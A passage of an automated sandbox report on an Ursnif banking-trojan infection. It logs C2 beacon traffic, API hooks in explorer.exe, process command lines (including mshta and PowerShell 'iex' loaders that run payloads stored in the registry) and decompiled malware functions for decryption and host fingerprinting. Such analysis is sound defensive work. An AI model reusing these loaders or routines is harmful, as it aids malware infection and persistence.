Content-Type: application/octet-stream
Content-Length: 194718
Connection: close
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="613ae6d9f31b9.bin"
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff


Session ID: 1 | Source IP: 192.168.2.3 | Source Port: 49791 | Destination IP: 185.251.90.253 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: Sep 10, 2021 07:02:18.547163010 CEST | kBytes transferred: 5468 | Direction: OUT
GET /JWEVOwMBnh_2FtPS/WMS3RPVZyjTSnTq/9Hxp202Yz5PgJEOrB6/nF_2FNmSa/SQyIRZk5j_2B3OcT7rdM/7npsCxfJSu8JbD_2FiM/y1HBEgDsmQFEPX27nGHHbz/zR0jF_2FnlVo0/Nxk3zALE/ofyPMDXzWjS1IpBinC5Sz4W/cf_2F5pD8G/46Dgl0akFp2cXbFnY/HwtGCbH5Q64m/f9VXk69LnhQ/x_2B8W86eQh4Rn/mNr7OMCC6GA9c9ph_2Bg7/ddhYlIa8YUPQgtGC/8R2fSBf4sQLaQ_2/FLycNJhDT_2FxWMMIH/41wPmVaCG/UdSw_2BuW4yZulffApAL/Gvq14U65qaj/9np83 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
Host: atl.bigbigpoppa.com

Timestamp: Sep 10, 2021 07:02:19.014877081 CEST | kBytes transferred: 5470 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Sep 2021 05:02:18 GMT
Content-Type: application/octet-stream
Content-Length: 247965
Connection: close
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="613ae6daf07a3.bin"
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff


Session ID: 2
Source IP: 192.168.2.3
Source Port: 49792
Destination IP: 185.251.90.253
Destination Port: 80
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
Sep 10, 2021 07:02:19.594026089 CEST | 5727 | OUT | GET /gO6fEM48Z2VyJYyEaQk/Tlg2ka7bPKYxRb_2B442I_/2FFZLVL8c_2BN/KPEiurg_/2FQFW58y_2BC5_2BoQJsMfC/Z20kSl3bCK/Qe_2BCo_2BI8EhVfz/gaTQA1FJpKmh/Okd_2B3iR1p/U_2F_2F_2BxYfZ/z_2B8obDRzLj_2BvPtXpS/MutYXow3kjfHv8Ne/Tk41k1QbLs08co6/pw6aojLzb_2BsMklC7/1luisc2vx/yYmG1Q6eqChu6qOfd2lR/zgadpa0en2mVI5QE7we/rWllKXh4B6iqFxDAWQqk8G/Oj17QsJan3SWq/MhUPAmuR/Yiolc5JDgbwuOe67l9VgfXi/kgInUUiADdo06Z7N/8 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
Host: atl.bigbigpoppa.com
Sep 10, 2021 07:02:20.036945105 CEST | 5728 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Sep 2021 05:02:20 GMT
Content-Type: application/octet-stream
Content-Length: 1958
Connection: close
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="613ae6dc004be.bin"
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff


Session ID: 3
Source IP: 192.168.2.3
Source Port: 49793
Destination IP: 185.251.90.253
Destination Port: 80
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
Sep 10, 2021 07:02:44.225999117 CEST | 5731 | OUT | GET /fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Host: art.microsoftsofymicrosoftsoft.at
Sep 10, 2021 07:02:44.743824005 CEST | 5732 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Sep 2021 05:02:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4
Source IP: 192.168.2.3
Source Port: 49794
Destination IP: 185.251.90.253
Destination Port: 80
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
Sep 10, 2021 07:02:45.111639977 CEST | 5733 | OUT | POST /E5wXpiwar/wRvu2gZe47zRdlNBgcs0/eOhrCgUr4ZXAn_2BZqF/9q3EAQRMUh_2B_2F33UbfY/IXr06mXceQHe3/2iAe1c3a/9nqOhYkWYxxgxCOECBlwLnA/sWEj3oJk5h/PRzUbXzmSIea8A2EU/_2FwPSG35Krj/kfkkMNBeoRA/5ZUbFMHjnJYo4_/2Fjo7tU3n9R4Z09v5Qh4q/QBVxo02azbkNlwWF/Bex9GHi32MTaVfj/GKDsgaU6HjZIpEcGiU/Q_2FxW4S4/w_2F825rdJVVRhGtH6Fv/DcD1MSlvdu470uFUctq/iMqZ2HgnOsvQUh/nmg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Content-Length: 2
Host: art.microsoftsofymicrosoftsoft.at
Sep 10, 2021 07:02:45.111676931 CEST | 5733 | OUT | Data Raw: 0d 0a
Data Ascii:
Sep 10, 2021 07:02:45.626944065 CEST | 5733 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 10 Sep 2021 05:02:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 146
Connection: close
Vary: Accept-Encoding
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

Function Name | Hook Type | Active in Processes
CreateProcessAsUserW | EAT | explorer.exe
CreateProcessAsUserW | INLINE | explorer.exe
CreateProcessW | EAT | explorer.exe
CreateProcessW | INLINE | explorer.exe
CreateProcessA | EAT | explorer.exe
CreateProcessA | INLINE | explorer.exe
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | explorer.exe

                                                      Processes

Process: explorer.exe, Module: KERNEL32.DLL
Function Name | Hook Type | New Data
CreateProcessAsUserW | EAT | 7FFB70FF521C
CreateProcessAsUserW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW | EAT | 7FFB70FF5200
CreateProcessW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA | EAT | 7FFB70FF520E
CreateProcessA | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFB70FF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 612777C

Process: explorer.exe, Module: WININET.dll
Function Name | Hook Type | New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFB70FF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 612777C

                                                      Statistics

                                                      CPU Usage


                                                      Memory Usage


                                                      High Level Behavior Distribution


                                                      Behavior


                                                      System Behavior

                                                      General

                                                      Start time:06:59:00
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs'
                                                      Imagebase:0x7ff782620000
                                                      File size:163840 bytes
                                                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:07:01:44
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff66d5c0000
                                                      File size:488448 bytes
                                                      MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Start time:07:01:45
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\rundll32.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                                                      Imagebase:0x7ff69a210000
                                                      File size:69632 bytes
                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:07:01:45
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                                                      Imagebase:0x1220000
                                                      File size:61952 bytes
                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, Author: Joe Security
                                                      Reputation:high

                                                      General

                                                      Start time:07:02:16
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x3c0000
                                                      File size:426496 bytes
                                                      MD5 hash:7AB59579BA91115872D6E51C54B9133B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Start time:07:02:23
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff66d5c0000
                                                      File size:488448 bytes
                                                      MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Start time:07:02:24
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\mshta.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                                                      Imagebase:0x7ff6a90e0000
                                                      File size:14848 bytes
                                                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Start time:07:02:25
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                                                      Imagebase:0x7ff785e30000
                                                      File size:447488 bytes
                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, Author: Joe Security
                                                      Reputation:high

                                                      General

                                                      Start time:07:02:26
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6b2800000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:07:02:32
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
                                                      Imagebase:0x7ff758a80000
                                                      File size:2739304 bytes
                                                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:moderate

                                                      General

                                                      Start time:07:02:33
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'
                                                      Imagebase:0x7ff62db00000
                                                      File size:47280 bytes
                                                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      Disassembly

                                                      Code Analysis


                                                        Executed Functions

                                                        C-Code - Quality: 58%
                                                        			E01203276(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                        				int _v8;
                                                        				long* _v12;
                                                        				int _v16;
                                                        				BYTE* _v20;
                                                        				long* _v24;
                                                        				void* _v39;
                                                        				char _v40;
                                                        				void _v56;
                                                        				int _v60;
                                                        				intOrPtr _v64;
                                                        				void _v67;
                                                        				char _v68;
                                                        				void* _t61;
                                                        				int _t68;
                                                        				signed int _t76;
                                                        				int _t79;
                                                        				int _t81;
                                                        				int _t85;
                                                        				long _t86;
                                                        				int _t90;
                                                        				signed int _t94;
                                                        				int _t101;
                                                        				BYTE* _t102;
                                                        				int _t103;
                                                        				void* _t104;
                                                        				void* _t105;
                                                        				void* _t106;
                                                        
                                                        				_t103 = __eax;
                                                        				_t94 = 6;
                                                        				_v68 = 0;
                                                        				memset( &_v67, 0, _t94 << 2);
                                                        				_t105 = _t104 + 0xc;
                                                        				asm("stosw");
                                                        				asm("stosb");
                                                        				_v40 = 0;
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				asm("stosw");
                                                        				asm("stosb");
                                                        				_t61 =  *0x120a0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                                        				if(_t61 == 0) {
                                                        					_a8 = GetLastError();
                                                        				} else {
                                                        					_t101 = 0x10;
                                                        					memcpy( &_v56, _a8, _t101);
                                                        					_t106 = _t105 + 0xc;
                                                        					_v60 = _t101;
                                                        					_v67 = 2;
                                                        					_v64 = 0x660e;
                                                        					_v68 = 8;
                                                        					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                                                        					if(_t68 == 0) {
                                                        						_a8 = GetLastError();
                                                        					} else {
                                                        						_push(0);
                                                        						_push( &_v40);
                                                        						_push(1);
                                                        						_push(_v12);
                                                        						if( *0x120a0b8() == 0) {
                                                        							_a8 = GetLastError();
                                                        						} else {
                                                        							_t18 = _t103 + 0xf; // 0x10
                                                        							_t76 = _t18 & 0xfffffff0;
                                                        							if(_a4 != 0 && _t76 == _t103) {
                                                        								_t76 = _t76 + _t101;
                                                        							}
                                                        							_t102 = E01205FBC(_t76);
                                                        							_v20 = _t102;
                                                        							if(_t102 == 0) {
                                                        								_a8 = 8;
                                                        							} else {
                                                        								_v16 = 0;
                                                        								_a8 = 0;
                                                        								while(1) {
                                                        									_t79 = 0x10;
                                                        									_v8 = _t79;
                                                        									if(_t103 <= _t79) {
                                                        										_v8 = _t103;
                                                        									}
                                                        									memcpy(_t102, _a12, _v8);
                                                        									_t81 = _v8;
                                                        									_a12 = _a12 + _t81;
                                                        									_t103 = _t103 - _t81;
                                                        									_t106 = _t106 + 0xc;
                                                        									if(_a4 == 0) {
                                                        										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                                                        									} else {
                                                        										_t85 =  *0x120a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                                                        									}
                                                        									if(_t85 == 0) {
                                                        										break;
                                                        									}
                                                        									_t90 = _v8;
                                                        									_v16 = _v16 + _t90;
                                                        									_t102 =  &(_t102[_t90]);
                                                        									if(_t103 != 0) {
                                                        										continue;
                                                        									} else {
                                                        										L17:
                                                        										 *_a16 = _v20;
                                                        										 *_a20 = _v16;
                                                        									}
                                                        									goto L21;
                                                        								}
                                                        								_t86 = GetLastError();
                                                        								_a8 = _t86;
                                                        								if(_t86 != 0) {
                                                        									E012013CC(_v20);
                                                        								} else {
                                                        									goto L17;
                                                        								}
                                                        							}
                                                        						}
                                                        						L21:
                                                        						CryptDestroyKey(_v12);
                                                        					}
                                                        					CryptReleaseContext(_v24, 0);
                                                        				}
                                                        				return _a8;
                                                        			}

                                                        APIs
                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,01206E82,00000001,01204A9F,00000000), ref: 012032AE
                                                        • memcpy.NTDLL(01206E82,01204A9F,00000010,?,?,?,01206E82,00000001,01204A9F,00000000,?,012071BA,00000000,01204A9F,?,00000000), ref: 012032C7
                                                        • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 012032F0
                                                        • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 01203308
                                                        • memcpy.NTDLL(00000000,00000000,05769630,00000010), ref: 0120335A
                                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05769630,00000020,?,?,00000010), ref: 01203383
                                                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05769630,?,?,00000010), ref: 0120339A
                                                        • GetLastError.KERNEL32(?,?,00000010), ref: 012033B2
                                                        • GetLastError.KERNEL32 ref: 012033E4
                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 012033F0
                                                        • GetLastError.KERNEL32 ref: 012033F8
                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 01203405
                                                        • GetLastError.KERNEL32(?,?,?,01206E82,00000001,01204A9F,00000000,?,012071BA,00000000,01204A9F,?,00000000,01204A9F,00000000,05769630), ref: 0120340D
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                                        • String ID:
                                                        • API String ID: 1967744295-0
                                                        • Opcode ID: b44a990021cd99dee04e66746b2e1adfc3969db9336bd129f0711d78641ae833
                                                        • Instruction ID: 2c5f05307c34414c82ae35dbff4b0ac3da50b679bbadea4e6e731b552f873c00
                                                        • Opcode Fuzzy Hash: b44a990021cd99dee04e66746b2e1adfc3969db9336bd129f0711d78641ae833
                                                        • Instruction Fuzzy Hash: B5517571910209FFDF12DFA8DC88AAEBBB9FB04340F008525FA15E7282D7719954CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 96%
                                                        			E01206CD6(char __eax, signed int* __esi) {
                                                        				long _v8;
                                                        				char _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v28;
                                                        				long _t34;
                                                        				signed int _t39;
                                                        				long _t50;
                                                        				char _t59;
                                                        				intOrPtr _t61;
                                                        				void* _t62;
                                                        				void* _t63;
                                                        				signed int* _t64;
                                                        				char _t65;
                                                        				intOrPtr* _t67;
                                                        				void* _t68;
                                                        				signed int* _t69;
                                                        
                                                        				_t69 = __esi;
                                                        				_t65 = __eax;
                                                        				_v8 = 0;
                                                        				_v12 = __eax;
                                                        				if(__eax == 0) {
                                                        					_t59 =  *0x120a2c8; // 0xbd092303
                                                        					_v12 = _t59;
                                                        				}
                                                        				_t64 = _t69;
                                                        				E012059CB( &_v12, _t64);
                                                        				if(_t65 != 0) {
                                                        					 *_t69 =  *_t69 ^  *0x120a2d0 ^ 0x46d76429;
                                                        				} else {
                                                        					GetUserNameW(0,  &_v8); // executed
                                                        					_t50 = _v8;
                                                        					if(_t50 != 0) {
                                                        						_t62 = RtlAllocateHeap( *0x120a290, 0, _t50 + _t50);
                                                        						if(_t62 != 0) {
                                                        							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                        								_t63 = _t62;
                                                        								 *_t69 =  *_t69 ^ E012056BF(_v8 + _v8, _t63);
                                                        							}
                                                        							HeapFree( *0x120a290, 0, _t62);
                                                        						}
                                                        					}
                                                        				}
                                                        				_t61 = __imp__;
                                                        				_v8 = _v8 & 0x00000000;
                                                        				GetComputerNameW(0,  &_v8);
                                                        				_t34 = _v8;
                                                        				if(_t34 != 0) {
                                                        					_t68 = RtlAllocateHeap( *0x120a290, 0, _t34 + _t34);
                                                        					if(_t68 != 0) {
                                                        						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                        							_t63 = _t68;
                                                        							_t69[3] = _t69[3] ^ E012056BF(_v8 + _v8, _t63);
                                                        						}
                                                        						HeapFree( *0x120a290, 0, _t68);
                                                        					}
                                                        				}
                                                        				asm("cpuid");
                                                        				_t67 =  &_v28;
                                                        				 *_t67 = 1;
                                                        				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                        				 *(_t67 + 8) = _t63;
                                                        				 *(_t67 + 0xc) = _t64;
                                                        				_t39 = _v16 ^ _v20 ^ _v28;
                                                        				_t69[1] = _t69[1] ^ _t39;
                                                        				return _t39;
                                                        			}

                                                        APIs
                                                        • GetUserNameW.ADVAPI32(00000000,0120453B), ref: 01206D0D
                                                        • RtlAllocateHeap.NTDLL(00000000,0120453B), ref: 01206D24
                                                        • GetUserNameW.ADVAPI32(00000000,0120453B), ref: 01206D31
                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,0120453B,?,?,?,?,?,012068F7,?,00000001), ref: 01206D52
                                                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01206D79
                                                        • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 01206D8D
                                                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01206D9A
                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 01206DB8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: HeapName$AllocateComputerFreeUser
                                                        • String ID:
                                                        • API String ID: 3239747167-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 38%
                                                        			E012040DC(char _a4, void* _a8) {
                                                        				void* _v8;
                                                        				void* _v12;
                                                        				char _v16;
                                                        				void* _v20;
                                                        				char _v24;
                                                        				char _v28;
                                                        				char _v32;
                                                        				char _v36;
                                                        				char _v40;
                                                        				void* _v44;
                                                        				void** _t33;
                                                        				void* _t40;
                                                        				void* _t43;
                                                        				void** _t44;
                                                        				intOrPtr* _t47;
                                                        				char _t48;
                                                        
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				_v20 = _a4;
                                                        				_t48 = 0;
                                                        				_v16 = 0;
                                                        				_a4 = 0;
                                                        				_v44 = 0x18;
                                                        				_v40 = 0;
                                                        				_v32 = 0;
                                                        				_v36 = 0;
                                                        				_v28 = 0;
                                                        				_v24 = 0;
                                                        				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                        					_t33 =  &_v8;
                                                        					__imp__(_v12, 8, _t33);
                                                        					if(_t33 >= 0) {
                                                        						_t47 = __imp__;
                                                        						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                        						_t44 = E01205FBC(_a4);
                                                        						if(_t44 != 0) {
